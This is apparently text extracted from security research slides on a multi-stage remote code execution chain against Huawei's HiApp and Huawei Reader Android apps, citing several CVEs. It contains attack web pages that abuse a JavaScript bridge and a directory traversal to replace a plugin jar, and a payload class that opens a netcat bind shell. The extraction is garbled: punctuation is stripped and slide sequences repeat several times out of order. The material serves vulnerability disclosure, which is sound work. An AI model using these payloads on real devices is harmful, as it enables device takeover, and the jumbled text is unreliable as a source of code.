return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
